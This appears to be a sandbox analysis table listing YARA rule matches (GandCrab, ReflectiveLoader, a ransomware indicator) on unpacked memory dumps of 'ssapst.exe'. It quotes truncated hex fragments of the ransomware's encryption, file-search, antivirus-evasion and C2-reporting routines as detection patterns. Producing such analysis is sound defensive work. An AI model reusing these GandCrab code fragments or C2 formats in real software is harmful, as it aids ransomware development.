6.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
6.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
6.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
12.3.ssapst.exe.3730000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
12.3.ssapst.exe.3730000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
12.3.ssapst.exe.3730000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
12.3.ssapst.exe.3730000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
12.3.ssapst.exe.3730000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
12.3.ssapst.exe.3730000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
24.3.ssapst.exe.3b60000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
24.3.ssapst.exe.3b60000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
24.3.ssapst.exe.3b60000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
24.3.ssapst.exe.3b60000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
24.3.ssapst.exe.3b60000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
24.3.ssapst.exe.3b60000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
18.3.ssapst.exe.3230000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
18.3.ssapst.exe.3230000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
18.3.ssapst.exe.3230000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
18.3.ssapst.exe.3230000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
18.3.ssapst.exe.3230000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
18.3.ssapst.exe.3230000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
15.3.ssapst.exe.3300000.0.raw.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
15.3.ssapst.exe.3300000.0.raw.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
15.3.ssapst.exe.3300000.0.raw.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
15.3.ssapst.exe.3300000.0.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
15.3.ssapst.exe.3300000.0.raw.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
15.3.ssapst.exe.3300000.0.raw.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
17.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
17.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
17.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
17.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
17.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
17.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
8.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
8.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
8.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
8.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
8.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
8.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
22.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
22.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
22.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
22.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
22.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
22.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
14.0.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
14.0.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
14.0.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
14.0.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
14.0.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
14.0.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
24.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
24.2.ssapst.exe.fe60000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
24.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
24.2.ssapst.exe.fe60000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
24.2.ssapst.exe.fe60000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
24.2.ssapst.exe.fe60000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
24.2.ssapst.exe.fe60000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 E6 0F 8B 35 44 A1 E6 0F 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 E6 0F 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 E6 0F ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 E6 0F 8B 35 10 A1 E6 0F 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 E6 0F C7 44 24 1C 64 F4 E6 0F C7 44 24 20 80 F4 E6 0F C7 44 24 24 A0 F4 E6 0F C7 44 24 28 BC F4 E6 0F C7 44 24 2C D8 F4 E6 0F C7 44 24 30 F0 F4 E6 0F C7 44 24 34 04 F5 E6 0F ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 E6 0F 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 E7 0F C7 45 B8 BC 03 E7 0F C7 45 BC ...
19.3.ssapst.exe.3520000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xd992:$x1: ReflectiveLoader
19.3.ssapst.exe.3520000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xd2fe:$: DECRYPT.txt 0xd364:$: DECRYPT.txt
19.3.ssapst.exe.3520000.0.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
19.3.ssapst.exe.3520000.0.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xd991:$s1: _ReflectiveLoader@ 0xd992:$s2: ReflectiveLoader@
19.3.ssapst.exe.3520000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xcfc8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
19.3.ssapst.exe.3520000.0.unpack	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x3cf0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4161:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x55f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x30d3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6370:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
25.2.ssapst.exe.fe60000.0.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
